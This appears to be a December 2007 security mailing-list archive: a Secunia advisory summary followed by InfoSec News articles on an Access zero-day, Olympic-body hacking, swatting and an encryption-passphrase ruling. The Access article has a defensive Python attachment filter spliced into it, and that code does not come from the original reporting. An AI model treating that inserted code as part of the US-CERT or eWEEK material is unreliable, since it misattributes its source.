[SA27971] Avaya Products Apache mod_proxy "date" Denial of Service
Critical:    Less critical
Where:       From remote
Impact:      DoS
Released:    2007-12-07

Avaya has acknowledged a vulnerability in various Avaya products, which can be exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/27971/

--
[SA27967] Ubuntu update for tetex-bin and texlive-bin
Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data, Exposure of sensitive information, DoS, System access
Released:    2007-12-07

Ubuntu has issued an update for tetex-bin and texlive-bin. This fixes some vulnerabilities, which can be exploited by malicious, local users to disclose and manipulate sensitive information and by malicious people to potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27967/

--
[SA28040] Mandriva update for MySQL
Critical:    Less critical
Where:       From local network
Impact:      Security Bypass, Manipulation of data, DoS
Released:    2007-12-11

Mandriva has issued an update for MySQL. This fixes some vulnerabilities, which can be exploited by malicious, local users to manipulate certain data and by malicious users to bypass certain security restrictions or cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/28040/

--
[SA28052] Red Hat autofs "/net" Privilege Escalation Vulnerability
Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2007-12-12

A vulnerability has been reported in Red Hat Enterprise Linux, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/28052/

--
[SA28023] Gentoo update for lookup
Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2007-12-10

Gentoo has issued an update for lookup. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/28023/

--
[SA28004] Fedora update for xorg-x11-xfs
Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2007-12-11

Fedora has issued an update for xorg-x11-xfs. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/28004/

--
[SA27978] Fedora update for zabbix
Critical:    Not critical
Where:       From local network
Impact:      Privilege escalation
Released:    2007-12-10

Fedora has issued an update for zabbix. This fixes a weakness, which can be exploited by malicious users to perform certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/27978/

--
[SA28070] Linux Kernel "mmap_min_addr" Security Bypass
Critical:    Not critical
Where:       Local system
Impact:      Security Bypass
Released:    2007-12-12

A security issue has been reported in the Linux Kernel, which can be exploited by malicious, local users to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/28070/

-- [SA28057] Avaya CMS / IR Solaris Remote Procedure Call Module Denial of Service

Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-12

Avaya has acknowledged a vulnerability in Avaya CMS / IR, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/28057/

-- [SA28048] Mac OS X "cs_validate_page()" Local Denial of Service

Critical: Not critical
Where: Local system
Impact: DoS
Released: 2007-12-13

mu-b has reported a vulnerability in Mac OS X, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/28048/

Other:

-- [SA27970] IBM HMC Version 3 Privilege Escalation Vulnerabilities

Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2007-12-07

Some vulnerabilities have been reported in IBM HMC, which can be exploited by malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/27970/

Cross Platform:

-- [SA28066] ViArt CMS/HelpDesk/Shop "root_folder_path" File Inclusion

Critical: Highly critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information, System access
Released: 2007-12-12

RoMaNcYxHaCkEr has discovered a vulnerability in various ViArt products, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28066/

-- [SA28058] CityWriter "path" File Inclusion Vulnerability

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-13

RoMaNcYxHaCkEr has discovered a vulnerability in CityWriter, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/28058/

-- [SA28054] Fastpublish CMS designconfig.php File Inclusion

Critical: Highly critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information, System access
Released: 2007-12-13

RoMaNcYxHaCkEr has discovered a vulnerability in Fastpublish CMS, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28054/

-- [SA28047] Falcon Series One Multiple Vulnerabilities

Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, System access
Released: 2007-12-11

MhZ91 has reported some vulnerabilities in Falcon Series One, which can be exploited by malicious people to conduct script insertion and cross-site request forgery attacks and to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/28047/

-- [SA28018] Sun StarOffice/StarSuite Database Document Processing Arbitrary Java Method Execution

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-10

Sun has acknowledged a vulnerability in Sun StarOffice and StarSuite, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/28018/

-- [SA27974] Novell NetMail AntiVirus Agent Integer Overflow Vulnerability

Critical: Highly critical
Where: From remote
Impact: System access
Released: 2007-12-07

A vulnerability has been reported in Novell NetMail, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/27974/

-- [SA28080] Robocode Arbitrary Java Code Execution Security Issue

Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2007-12-13

A security issue has been reported in Robocode, which can be exploited by malicious people to bypass certain security restrictions.
Full Advisory:
http://secunia.com/advisories/28080/

-- [SA28075] MMS Gallery PHP "id" File Inclusion Vulnerabilities

Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2007-12-13

GoLd_M has reported some vulnerabilities in MMS Gallery PHP, which can be exploited by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/28075/

-- [SA28071] xml2owl "file" Information Disclosure Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2007-12-13

GoLd_M has discovered a vulnerability in xml2owl, which can be exploited by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/28071/

-- [SA28053] Mcms Easy Web Make "template" Local File Inclusion

Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2007-12-12

MhZ91 has discovered a vulnerability in Mcms Easy Web Make, which can be exploited by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/28053/

-- [SA28045] Falt4 CMS Cross-Site Scripting and SQL Injection Vulnerabilities

Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2007-12-11

Mesut Timur has reported some vulnerabilities in Falt4 CMS, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/28045/

-- [SA28035] Cybozu Office Multiple Vulnerabilities

Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, DoS
Released: 2007-12-11

Some vulnerabilities have been reported in Cybozu Office, which can be exploited by malicious people to conduct cross-site scripting attacks, HTTP header injection attacks, or cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/28035/

-- [SA28014] aurora framework "pack_var()" SQL Injection Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-12

A vulnerability has been reported in aurora framework, which can be exploited by malicious people to conduct SQL injection attacks against applications using the framework.

Full Advisory:
http://secunia.com/advisories/28014/

-- [SA28013] PolDoc Document Management System "filename" Information Disclosure

Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2007-12-10

GoLd_M has discovered a vulnerability in PolDoc Document Management System (PDDMS), which can be exploited by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/28013/

-- [SA27990] DWdirectory "search" SQL Injection Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-10

t0pP8uZz & xprog have reported a vulnerability in DWdirectory, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/27990/

-- [SA27988] Ace Image Hosting Script "id" SQL Injection Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-10

t0pP8uZz & xprog have reported a vulnerability in Ace Image Hosting Script, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/27988/

-- [SA27986] Content Injector "id" SQL Injection Vulnerability

Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information
Released: 2007-12-10

S.W.A.T. has discovered a vulnerability in Content Injector, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/27986/

-- [SA28082] Hitachi Web Server Cross-Site Scripting Vulnerabilities

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-13

Hitachi has acknowledged some vulnerabilities in the Hitachi Web Server, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28082/

-- [SA28081] Apache mod_imap Module Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-13

A vulnerability has been reported in the mod_imap module for Apache, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28081/

-- [SA28078] BEA WebLogic Mobility Server Image Converter Security Bypass

Critical: Less critical
Where: From remote
Impact: Security Bypass
Released: 2007-12-13

A vulnerability has been reported in the BEA WebLogic Mobility Server, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/28078/

-- [SA28077] JBoss Seam "order" EJBQL Injection Vulnerability

Critical: Less critical
Where: From remote
Impact: Manipulation of data
Released: 2007-12-13

A vulnerability has been reported in JBoss Seam, which potentially can be exploited by malicious people to conduct SQL injection attacks against applications using the framework.
Full Advisory:
http://secunia.com/advisories/28077/

-- [SA28073] Apache mod_imap Module Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-12

A vulnerability has been reported in the mod_imap module for Apache, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28073/

-- [SA28069] Rainboard Unspecified Cross-Site Scripting

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-12

A vulnerability has been reported in Rainboard, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28069/

-- [SA28063] MySQL Security Issue and Two Vulnerabilities

Critical: Less critical
Where: From remote
Impact: Manipulation of data, Privilege escalation, DoS
Released: 2007-12-12

A security issue and two vulnerabilities have been reported in MySQL, which can be exploited by malicious users to gain escalated privileges, manipulate certain data, or to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/28063/

-- [SA28049] Cybozu Products Cross-Site Scripting and HTTP Header Injection

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-11

Some vulnerabilities have been reported in Cybozu products, which can be exploited by malicious people to conduct cross-site scripting and HTTP header injection attacks.

Full Advisory:
http://secunia.com/advisories/28049/

-- [SA28046] Apache mod_imagemap Module Cross-Site Scripting Vulnerability

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-12

A vulnerability has been reported in the mod_imagemap module for Apache, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/28046/

-- [SA28024] bitweaver Cross-Site Scripting Vulnerabilities

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-10

DoZ has discovered some vulnerabilities in bitweaver, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28024/

-- [SA28012] Serendipity Remote RSS Sidebar Plugin Script Insertion

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-10

A vulnerability has been reported in Serendipity, which can be exploited by malicious people to conduct script-insertion attacks.

Full Advisory:
http://secunia.com/advisories/28012/

-- [SA28006] WebSPELL Multiple Cross-Site Scripting Vulnerabilities

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-11

Brainhead has discovered some vulnerabilities in WebSPELL, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/28006/

-- [SA28005] WordPress GBK/Big5 Character Set "s" SQL Injection

Critical: Less critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information
Released: 2007-12-11

Abel Cheung has discovered a vulnerability in WordPress, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/28005/

-- [SA27966] OpenNewsletter "type" Cross-Site Scripting

Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2007-12-07

Manuel Fernandez has discovered a vulnerability in OpenNewsletter, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/27966/

-- [SA28026] Websense User-Agent Filtering Bypass Security Issue

Critical: Less critical
Where: From local network
Impact: Security Bypass
Released: 2007-12-13

mrhinkydink has reported a security issue in Websense, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/28026/

-- [SA27981] MySQL System Table Information Overwrite Vulnerability

Critical: Less critical
Where: Local system
Impact: Manipulation of data
Released: 2007-12-10

A vulnerability has been reported in MySQL, which can be exploited by malicious, local users to manipulate certain data.

Full Advisory:
http://secunia.com/advisories/27981/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.

Secunia NEVER sends attached files with advisories.

Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

From alerts at infosecnews.org Fri Dec 14 00:21:41 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Test feds' info security savvy, report suggests
Message-ID:

http://www.fcw.com/online/news/151066-1.html

By Mary Mosquera
FCW.com
December 13, 2007

A majority of federal workers continue to violate information security policies despite being aware of threats to agency systems and knowing the importance of following data security policies, a survey by SecureInfo found.

Among federal workers, 22 percent said they believe their co-workers follow information security policies and procedures half the time or less.
About 58 percent said they stick to them very frequently. Only 20 percent said their co-workers adhere to them all the time.

Although 97 percent of the participants said they were required to take information security training, awareness training is not enough. Only one-third said they remembered most of the material covered in the training, said Christopher Fountain, SecureInfo president and chief executive officer. Only 48 percent said their agency tested them, according to the report on information security awareness from the perspective of government workers.

"There seems to be a significant lack of understanding by the government worker that each individual plays a critical role in protecting information assets and contributes to an agency's information security posture," he said in the Dec. 10 report. "A greater sense of urgency is required."

Cyberattackers now use more sophisticated and stealthier techniques to exploit user trust, such as phishing, a technique to fool online users into divulging sensitive information. This makes the human element in information security the most unpredictable and critical vulnerability of an agency's systems, according to the September survey of 100 federal employees and contractors.

In its previous security awareness survey in May, SecureInfo found that many federal employees were unfamiliar with the Federal Information Security Management Act, and FISMA compliance is often viewed as a headache instead of a framework for improving system and data protection.

In its latest report, SecureInfo said agencies should test and hold their employees accountable to make sure that they understand and follow data security policies and procedures. Only 36 percent said that their knowledge of security policies and procedure was part of their annual performance review, Fountain said.
Agencies also should conduct random evaluations of employees' retention of security training content through social-engineering penetration testing techniques, such as attempts to get employees to share user ID and password information.

It is also critical to understand whether awareness training is effective and hold agencies accountable for it, Fountain said. Agency leadership should be required to publicly report on the effectiveness of training programs, he said.

With the appropriate focus on security awareness and accountability, federal workers will do a better job of protecting government information and systems.

From alerts at infosecnews.org Fri Dec 14 00:21:56 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Attackers Targeting Zero-Day Access Flaw
Message-ID:

http://www.eweek.com/article2/0,1895,2234056,00.asp

By Lisa Vaas
eWEEK.com
December 13, 2007

Attackers are going after Microsoft Office Access databases, US-CERT warned earlier in the week, taking advantage of an unpatched stack buffer overflow to deliver malicious databases that are leading to system hijacking in an undetermined number of cases.

Security researchers didn't have many details on the attacks, but US-CERT's advisory did say that users don't have to do anything beyond open a rigged Access database in order for a successful exploit to be sprung on them. The malicious files are of file type .MDB.

McAfee's Avert Labs said in a Dec. 12 posting that attacks could come via a number of vectors: via the Web, e-mail or instant messaging, "coupled with well-establishing social engineering techniques" to trick victims into launching an attachment that's been booby trapped.

US-CERT is recommending that, in lieu of a patch, users take these mitigation steps:

* Avoid opening attachments from people they don't know or trust or that they haven't solicited.

* Block high-risk file attachments at e-mail gateways.
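One way to implement the gateway-side blocking step above, as an added example that is not code from US-CERT, Microsoft or eWEEK: a Python filter that rejects attachments by extension (.MDB plus the macro-capable .doc/.xls Microsoft names) and also by content signature, so an .MDB renamed to a harmless extension is still caught. The policy list and the sample messages are constructed; the signatures ("Standard Jet DB" at byte offset 4 for Access 97-2003 files, the OLE2 compound-document header for legacy .doc/.xls) come from the published file formats, not from this article.

```python
"""Gateway-side attachment check for the high-risk file types discussed above.

Added example, not code from US-CERT, Microsoft or the article.  It blocks
by extension (.MDB, plus the macro-capable .doc/.xls Miller mentions) and
also by content signature, so a renamed .MDB is still caught.  The policy
list and sample messages are constructed for illustration.
"""
import email
from email import policy
from email.message import EmailMessage
from typing import List, Optional, Tuple

# Extensions the guidance above calls unsafe because they can carry
# embedded script or macros.  Constructed policy list; extend as needed.
HIGH_RISK_EXTENSIONS = {".mdb", ".doc", ".xls"}

# Content signatures from the published file formats (not from the page):
# Access 97-2003 .mdb files carry "Standard Jet DB" at byte offset 4, and
# legacy Office .doc/.xls are OLE2 compound documents that begin with
# D0 CF 11 E0 A1 B1 1A E1.
JET_MAGIC = b"Standard Jet DB"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def classify_payload(filename: str, data: bytes) -> Optional[str]:
    """Return a reason to block the attachment, or None if it passes."""
    name = (filename or "").lower()
    ext = name[name.rfind("."):] if "." in name else ""
    if ext in HIGH_RISK_EXTENSIONS:
        return "extension %s is on the high-risk list" % ext
    # Check content too: extension-only filters miss renamed files.
    if data[4:4 + len(JET_MAGIC)] == JET_MAGIC:
        return "content is an Access Jet database regardless of extension"
    if data.startswith(OLE2_MAGIC):
        return "content is an OLE2 compound document (legacy Office) regardless of extension"
    return None


def scan_message(raw: bytes) -> List[Tuple[str, str]]:
    """Parse a raw RFC 5322 message and list (filename, reason) for each blocked attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    blocked = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        name = part.get_filename() or "<unnamed>"
        reason = classify_payload(name, data)
        if reason is not None:
            blocked.append((name, reason))
    return blocked


def build_sample(filename: str, data: bytes) -> bytes:
    """Build a constructed test message carrying one attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "constructed sample"
    msg.set_content("see attached")
    msg.add_attachment(data, maintype="application", subtype="octet-stream",
                       filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    # Constructed sample payloads: a .mdb-style header under its own extension,
    # the same header under a harmless extension, and plain text that should pass.
    jet_header = b"\x00\x01\x00\x00" + JET_MAGIC + b"\x00"
    for raw in (build_sample("report.mdb", jet_header),
                build_sample("notes.txt", jet_header),
                build_sample("readme.txt", b"plain text, nothing to see")):
        print(scan_message(raw))
```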
Microsoft Director of Security Response Mark Miller said in a statement that, "Microsoft is aware of public reports of a malicious Microsoft Access Database file being used to compromise users," though he didn't provide information on how widespread the attack is at this point.

The file type in question, .MDB, is considered unsafe, Miller noted, since it's one of multiple file types that allow embedded script operations. Macros in Word files (*.doc) or in Excel files (*.xls) are other examples of file types that can be risky because of their less-than-obvious leniency on embedded scripts, according to this Microsoft support page on unsafe file types.

.MDB was used by Access Database versions up until 2003 and is either blocked by some Microsoft applications or provokes warnings before users can open such files, Miller said in his statement.

From alerts at infosecnews.org Fri Dec 14 00:22:11 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Britain teams bound for Beijing put on alert as hackers spark web of intrigue
Message-ID:

http://www.timesonline.co.uk/tol/sport/more_sport/article3048428.ece

By Owen Slot
Chief Sports Reporter
The Times
December 14, 2007

Computer hackers in China have broken into the information databases of the governing bodies of two British Olympic sports and, The Times can reveal, the Olympic family in the UK has been alerted that, with the Beijing Games less than eight months away, those threatening their security may be doing so to gain an illegal competitive advantage.

The first sport targeted was GB Canoeing, which was hit in October. The other Olympic sports in Britain were immediately informed, but the IT system of the Amateur Boxing Association of England (ABAE) was then subject to eight attacks over a three-week period and two investigations have traced all this activity back to internet protocol (IP) addresses in China.
"This wasn't kids mucking around," Paul King, the ABAE chief executive, said. "This was a real professional job."

Fears that these crimes may have been staged to steal information to help the perpetrators in the Games next summer were confirmed on Wednesday in an e-mail seen by The Times, which was part of the report delivered by Synergic UK Ltd, the IT partner of GB Canoeing that carried out the investigation into the attack on the website.

The report said: "In this case the source was China and the type of attack highly sophisticated and targeted. Fortunately, the servers involved held no performance data and it is our belief that this was the information being sought."

The review by Synergic into the security of the GB Canoeing website's servers worryingly exposed a lack of understanding of data security issues and the very real threats posed in the run-up to and in the Games themselves. It also advised that it is vital that staff are aware that there is a genuine threat to and indeed focus on gaining access to information that could be of help to the competition.

GB Canoeing and the ABAE are confident that no critical information has been stolen. Paul Owen, the chief executive of GB Canoeing, said that if such information was what the attackers were after, they were looking in the wrong place. King, however, explained that the attack on the ABAE systems, if more successful, could have been costly from a competitive point of view.

"We have all our individual assessments for all our boxers, their strengths, their weaknesses, stored on our system," he said. "We also hold information on the international competition. Take Alexey Tishchenko [the Olympic champion from Russia], for instance, who Frankie Gavin [the British lightweight who has qualified for Beijing] beat in the World Championships recently. No one had beaten him for four years and our post-fight analysis, what we did to beat him that no one else had done, might well be useful."
Despite the security investigations, no one can be sure of the motives of the hackers or even their origin. And the fact that the IP addresses were Chinese does not necessarily rule out the possibility of another foreign national working from a Chinese address. Indeed, the systems were subject to viruses and may simply have been a victim of sabotage, although the fact that two Olympic bodies were targeted within such a short space of time has fuelled fears that this may be a crime of a sporting nature.

The British Olympic Association (BOA) confirmed yesterday that it has been sufficiently concerned to have informed the IOC. "Attention was drawn to us about this situation," Simon Clegg, the BOA chief executive, said. "I thought we had a responsibility to share it with the Olympic family. It is a real danger when you consider how much information is held electronically. I simply don't know who is behind this, but I am concerned about the amount of information we hold in this way."

Owen said: "We were concerned that data had been downloaded and taken away, but we do not believe that that has been the case. And we naturally think it might be someone trying to get into our Olympic intelligence, though we have no evidence to believe that. I'll actually be more worried about when we get to Beijing next summer. Will the phones be tapped?"

This is not the first time that Britain teams have had such a brush with next year's hosts. The sailing team, the leading international force in their sport, have not had equipment returned to them that was confiscated by the Chinese authorities in March. They have been renting a house in Qingdao, the sailing venue, throughout the past year and, as is their standard practice, had installed equipment to monitor weather patterns. What concerns them is not so much the value of the equipment but the value of the data to which they no longer have access. Despite requesting its return, the equipment has not been given back.
To add to that, when they were in Qingdao for the pre-Olympic test event in August, they discovered that Chinese officials had been looking around their accommodation during daylight hours when they were out on the water competing. The team even had security staff on the door of their house, but one of the visitors happened to be the Mayor of Qingdao, head of the organising committee for the sailing event, who insisted that he be allowed in.

Spies like us

Sports have long resorted to espionage to get the upper hand on rivals.

* In the America's Cup, the keels of boats are covered in skirts to prevent other teams from noting their design. In 1983, guards chased away American divers who had tried to take a peek at the keel of Australia's entry.

* In 2001 it was alleged that the Lions rugby team had been spied on during their tour to Australia. Before the 2003 World Cup final, the England changing-room was swept for bugging devices.

From alerts at infosecnews.org Mon Dec 17 00:14:01 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] SWAT team goes to wrong home in 911 scam
Message-ID:

http://www.montereyherald.com/ci_7719737

By Julia Reynolds
Herald Staff Writer
12/14/2007

A Salinas family whose apartment was surrounded by more than a dozen heavily armed SWAT officers Wednesday night were victims of a high-tech, long-distance scam known as "swatting," police said.

Around 9:30 p.m., a caller to county 911 operators claimed to be a 15-year-old boy living in North Salinas. He said three armed men with AK-47 assault weapons were trying to break into his apartment.

As officers rushed to the 2200 block of North Main Street, the desperate caller told operators he'd hidden in a closet because the intruders entered the dwelling and were looking for him.

Police Cmdr. Bob Eggers said at least 15 SWAT officers surrounded the apartments, along with several sheriff's deputies who arrived after hearing frantic dispatches on their radios.
"Virtually the whole city went out there," Eggers said. "If you think about it, three men armed with AK-47s? It paralyzed us."

Believing they still were in danger, police ushered the boy's mother and sister out of the apartment under armored protection. It was then, police said, they learned they'd been scammed.

It turned out the 15-year-old boy in the apartment had been "chatting" on his computer with someone claiming to be a young man from Chicago. The person apparently used software or an Internet calling system to generate a phony call to Monterey County's 911 dispatchers, making them believe the call really came from the boy in Salinas.

Teen had no idea

Police said the Salinas youngster had no idea a SWAT team was heading toward his apartment until the boy's Internet acquaintance asked him through the computer if he "heard any sirens approaching."

Coincidentally, Eggers saw a television news program a few nights earlier about swatting, a new crime in which people disguise their caller ID to elicit a SWAT response for a false emergency, often from thousands of miles away. The callers are frequently young pranksters picking random victims, but in some cases, individuals have been targeted.

"I realized that this was exactly what occurred to us," Eggers said.

But the night didn't end there. Less than an hour after the SWAT unit rushed to North Main Street, Eggers' phone rang. The caller said police hadn't responded to an earlier burglary report.

"I asked where did the burglary occur. He gives the address we'd just been to," Eggers said. The caller identified himself as the 15-year-old boy.

"I said 'That's funny, we just spoke to him.' And he hung up," he said.

The swatter likely used Voice over Internet Protocol with a disguised caller ID, police said. VoIP services allow users to make calls directly from a computer, converting the voice into a digital signal that travels over the Internet that is then changed to a regular telephone signal.
Even after Eggers spoke with the apparent swatter, calls reporting emergencies at the same address came in twice more that night and police say they had to keep sending out officers to be sure residents were safe.

"What they're not getting is it leaves our city vulnerable and puts people in harm's way," Eggers said. "It's an extremely dangerous situation. It's beyond juvenile."

In other cities, similar pranks have occurred that, like the one in Salinas, could easily have turned deadly. An Orange County victim who thought he heard prowlers outside his house charged at SWAT officers with a knife in his hand, said news reports. The officers, who carried assault rifles and were accompanied by dogs and a helicopter, handcuffed the man and his wife at gunpoint, while the couple's two toddlers slept inside. Police said they thought they were responding to a shooting with threats to shoot more victims.

For that incident, 19-year-old Randal T. Ellis of Washington was charged with hacking, assault with a machine gun by proxy, false imprisonment and falsely reporting a crime. Prosecutors say he faces up to 18 years in prison. Ellis is scheduled for a preliminary hearing in Orange County next week.

In a case being tried in a Texas federal court, four online chatters were charged with conspiring to swat more than 100 victims around the country. Stuart Resoff of Ohio pleaded guilty in that case and faces up to five years in prison and payments and fines of $250,000 when he is sentenced in March, U.S. attorneys said.

Disguising caller ID

To disguise their caller IDs, known as "spoofing," swatters have either hacked into others' phone systems or have used legal services such as Spoofcard, which allows subscribers to disguise their caller ID as any number they choose. The service even electronically changes the gender of callers' voices if they choose.

Now some legislators want to shut down such activities, and the U.S. Senate will soon debate S.
704, also known as the Truth in Caller ID Act of 2007.

Police, meanwhile, are relying on their own computer geniuses to try to beat spoofers and swatters at their game. In the Orange County case, detectives were able to trace the crime to Ellis through computer forensics.

Salinas police are hoping to do the same with their own swatter. Officers said that after the SWAT operation Wednesday, the victim voluntarily gave up his computer to police for analysis by the department's computer forensic unit. Detectives are hoping they can find the swatter's IP address buried in the hard drive's files.

"Everything you do on them is traceable," Eggers said. "Hopefully our computer forensic folks are going to be able to find something valuable for us."

On Wednesday, before the long night was over for emergency responders, Eggers said the swatter struck a final time. That call wasn't placed to 911 operators or police. It was to a local restaurant, ordering $127 worth of pizza that was delivered to the boy's apartment. Eggers said the family sent it back.

From alerts at infosecnews.org Mon Dec 17 00:14:19 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Judge: Man can't be forced to divulge encryption passphrase
Message-ID:

http://www.news.com/8301-13578_3-9834495-38.html

Posted by Declan McCullagh
December 14, 2007

A federal judge in Vermont has ruled that prosecutors can't force a criminal defendant accused of having illegal images on his hard drive to divulge his PGP (Pretty Good Privacy) passphrase.

U.S. Magistrate Judge Jerome Niedermeier ruled that a man charged with transporting child pornography on his laptop across the Canadian border has a Fifth Amendment right not to turn over the passphrase to prosecutors. The Fifth Amendment protects the right to avoid self-incrimination.

Niedermeier tossed out a grand jury's subpoena that directed Sebastien Boucher to provide "any passwords" used with his Alienware laptop.
"Compelling Boucher to enter the password forces him to produce evidence that could be used to incriminate him," the judge wrote in an order dated November 29 that went unnoticed until this week. "Producing the password, as if it were a key to a locked container, forces Boucher to produce the contents of his laptop." Especially if this ruling is appealed, U.S. v. Boucher could become a landmark case. The question of whether a criminal defendant can be legally compelled to cough up his encryption passphrase remains an unsettled one, with law review articles for the last decade arguing the merits of either approach. (A U.S. Justice Department attorney wrote an article in 1996, for instance, titled "Compelled Production of Plaintext and Keys.") This debate has been one of analogy and metaphor. Prosecutors tend to view PGP passphrases as akin to someone possessing a key to a safe filled with incriminating documents. That person can, in general, be legally compelled to hand over the key. Other examples include the U.S. Supreme Court saying that defendants can be forced to provide fingerprints, blood samples, or voice recordings. Orin Kerr, a former Justice Department prosecutor who's now a law professor at George Washington University, shares this view. Kerr acknowledges that it's a tough call, but says, "I tend to think Judge Niedermeier was wrong given the specific facts of this case." The alternate view elevates individual rights over prosecutorial convenience. It looks to other Supreme Court cases saying Americans can't be forced to give "compelled testimonial communications" and argues the Fifth Amendment must apply to encryption passphrases as well. Courts already have ruled that that such protection extends to the contents of a defendant's minds, so why shouldn't a passphrase be shielded as well? In this case, Judge Niedermeier took the second approach. 
